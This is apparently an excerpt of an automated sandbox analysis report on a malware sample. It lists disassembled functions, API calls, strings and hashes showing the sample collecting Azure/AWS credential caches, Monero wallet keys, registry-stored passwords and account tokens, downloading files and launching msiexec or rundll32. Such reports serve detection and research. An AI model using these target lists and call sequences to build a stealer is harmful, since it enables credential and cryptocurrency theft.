                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 107cc596a99a07c2cabcfb02c403420a28ee9553383c78a3f967beb6efbe45f8
                                    • Instruction ID: f40f2e0158b519502fbf9ed553f4b8ad4ab122ca53f34f8e14125e872da9757a
                                    • Opcode Fuzzy Hash: 107cc596a99a07c2cabcfb02c403420a28ee9553383c78a3f967beb6efbe45f8
                                    • Instruction Fuzzy Hash: 5341857AA4020867DB10F7B0EC47FED7738AB65704F404594B685AA0C2EEF457C99B92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0009906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                    • Instruction ID: 19490ac2f9758468b87c934930cb18bf1ff2a3f4f9da5ac8137e6cb047c38a60
                                    • Opcode Fuzzy Hash: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                    • Instruction Fuzzy Hash: A671CA75A10208EBDF14EBE4EC89FEEB7B9BF48704F108508F515A7290DB35A905DB61
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000931C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0009335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000934EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                    • Instruction ID: 5fc5229e17d6dad0c005e502d56c18b656ceee13835ee0d58fcdb392329c72e9
                                    • Opcode Fuzzy Hash: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                    • Instruction Fuzzy Hash: 32121C71910118AADF19FBA0DC92FEEB778AF15300F504169F50666192EF342B4EDFA2
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                      • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                      • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                      • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                      • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                      • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                    • lstrlen.KERNEL32(00000000), ref: 0009532F
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                    • lstrlen.KERNEL32(00000000), ref: 00095383
                                    • lstrlen.KERNEL32(00000000), ref: 000953AE
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 554c2ab06e42fb293e1a29862ded371aca5edd4b1cd5d9ba9cf76d1dfdccee32
                                    • Instruction ID: 610813d34ac9537742f87b4260118639fea1cd7cf1aed987197ee175879418bd
                                    • Opcode Fuzzy Hash: 554c2ab06e42fb293e1a29862ded371aca5edd4b1cd5d9ba9cf76d1dfdccee32
                                    • Instruction Fuzzy Hash: D751DC70A20148DBCF14FF60DD96EEE7779AF11341F504018E50A5A593EF346B4AEBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a90b7bdf6f52c1ea13ee53478a68ff69b20c8901b4035067f34c894490657832
                                    • Instruction ID: ab1d852f20dd8c9ae7a8ccfb4d70efef9e9e1d1a1bec710d525c791220ed00e7
                                    • Opcode Fuzzy Hash: a90b7bdf6f52c1ea13ee53478a68ff69b20c8901b4035067f34c894490657832
                                    • Instruction Fuzzy Hash: 58C184B5A0021D9BCF14EF60DC8AFEE7378BB54304F004599F50AA7292DB70AA85DF91
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000942EC
                                    • lstrcat.KERNEL32(?,00D3F398), ref: 0009430B
                                    • lstrcat.KERNEL32(?,?), ref: 0009431F
                                    • lstrcat.KERNEL32(?,00D3DE68), ref: 00094333
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                      • Part of subcall function 00089CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 000993C0: GlobalAlloc.KERNEL32(00000000,000943DD,000943DD), ref: 000993D3
                                    • StrStrA.SHLWAPI(?,00D3F3C8), ref: 000943F3
                                    • GlobalFree.KERNEL32(?), ref: 00094512
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                      • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                      • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000944A3
                                    • StrCmpCA.SHLWAPI(?,000A08D1), ref: 000944C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000944D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000944E5
                                    • lstrcat.KERNEL32(00000000,000A0FB8), ref: 000944F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: cab55b5536a0d7f9ed69691990de0d4bcd95c7cf2e8382fb010c43379c6175bc
                                    • Instruction ID: dc93a4335fefa933d7b5ecf1e554d31a75fd498acc80cbf374735a1af49a4bd5
                                    • Opcode Fuzzy Hash: cab55b5536a0d7f9ed69691990de0d4bcd95c7cf2e8382fb010c43379c6175bc
                                    • Instruction Fuzzy Hash: B4711676900208ABDF14FBE0EC8AFEE77B9BB49304F048598F60597182DA35DB45DB91
                                    APIs
                                      • Part of subcall function 000812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                      • Part of subcall function 000812A0: RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                      • Part of subcall function 000812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                      • Part of subcall function 000812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                      • Part of subcall function 000812A0: RegCloseKey.ADVAPI32(?), ref: 000812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008134F
                                    • lstrlen.KERNEL32(?), ref: 0008135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00081377
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00081465
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 000814EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 42c28410f474caba07b0ba29dbb139d3f4f18bdcc8c8cb878f04dbc4d2cf7f9d
                                    • Instruction ID: 346e5854b0a0100acfb57cad3ce32f419982c5c06e2243031ea4706fc4337f8d
                                    • Opcode Fuzzy Hash: 42c28410f474caba07b0ba29dbb139d3f4f18bdcc8c8cb878f04dbc4d2cf7f9d
                                    • Instruction Fuzzy Hash: 2D5144B1E5011897CB15FB60DC96FEE737CAF55300F404198B60A66093EF705B89DBA6
                                    APIs
                                      • Part of subcall function 000872D0: memset.MSVCRT ref: 00087314
                                      • Part of subcall function 000872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                      • Part of subcall function 000872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                      • Part of subcall function 000872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                      • Part of subcall function 000872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                      • Part of subcall function 000872D0: HeapFree.KERNEL32(00000000), ref: 00087459
                                    • lstrcat.KERNEL32(00000000,000A17FC), ref: 00087606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00087648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 0008765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0008768F
                                    • lstrcat.KERNEL32(00000000,000A1804), ref: 000876A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000876D3
                                    • lstrcat.KERNEL32(00000000,000A1808), ref: 000876ED
                                    • task.LIBCPMTD ref: 000876FB
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                    • Instruction ID: f1b78da2fe00a68bffe477996a34699a4cc7e176f4180562e60ca133a6cab00a
                                    • Opcode Fuzzy Hash: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                    • Instruction Fuzzy Hash: 9431FA71900109DBCF08FBE8EC9DDFE7779BB48305B644118F106A7295DE34A946CB62
                                    APIs
                                    • memset.MSVCRT ref: 00087314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                    • HeapFree.KERNEL32(00000000), ref: 00087459
                                    • task.LIBCPMTD ref: 00087555
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                    • Instruction ID: 04de08661ed8a09ceef4d726763f3f7bbec2cfff06fe24cfaacd6d32ac6377b1
                                    • Opcode Fuzzy Hash: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                    • Instruction Fuzzy Hash: F5614AB580416C9BDB24EB50DC45FDAB7B8BF44304F1081E9E689A6146DBB09BC9CFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D3F2C0,00000000,?,000A0E2C,00000000,?,00000000), ref: 00098130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00098158
                                    • __aulldiv.LIBCMT ref: 00098172
                                    • __aulldiv.LIBCMT ref: 00098180
                                    • wsprintfA.USER32 ref: 000981AC
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                    • Instruction ID: f9e66a1022051dcb55224c4ed900ce1e242ef5aff4c4a339a42aa46437d4597e
                                    • Opcode Fuzzy Hash: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                    • Instruction Fuzzy Hash: 79215CB1E44208ABDF00DFD4DD4AFAEB7B8FB45B04F104209F605BB280C77869018BA5
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                    • InternetOpenA.WININET(000A0DF7,00000001,00000000,00000000,00000000), ref: 0008610F
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0008618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000861B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 000861DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0008620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00086249
                                    • InternetCloseHandle.WININET(?), ref: 00086253
                                    • InternetCloseHandle.WININET(00000000), ref: 00086260
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                    • Instruction ID: 39bc09f5b34554ab2756e51c4e466bcdd2727355e9761328b8acea57106f5164
                                    • Opcode Fuzzy Hash: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                    • Instruction Fuzzy Hash: 1B5161B1A00218ABDF20EF50DC49FEEB7B8FB44705F108098B645A72C1DB756A89CF95
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 0008BC9F
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0008BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 0008BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 0008BDB9
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                    • Instruction ID: 3494c23ae03be3f28986ac5020bb7c588b66600e52d3c53d89c382a87fd93ea3
                                    • Opcode Fuzzy Hash: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
